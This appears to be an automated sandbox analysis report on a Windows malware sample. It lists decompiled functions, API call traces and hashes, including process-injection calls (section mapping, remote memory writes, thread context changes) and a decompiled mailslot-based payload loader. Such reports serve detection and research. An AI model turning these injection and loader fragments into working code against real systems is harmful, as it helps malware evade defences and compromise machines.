  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
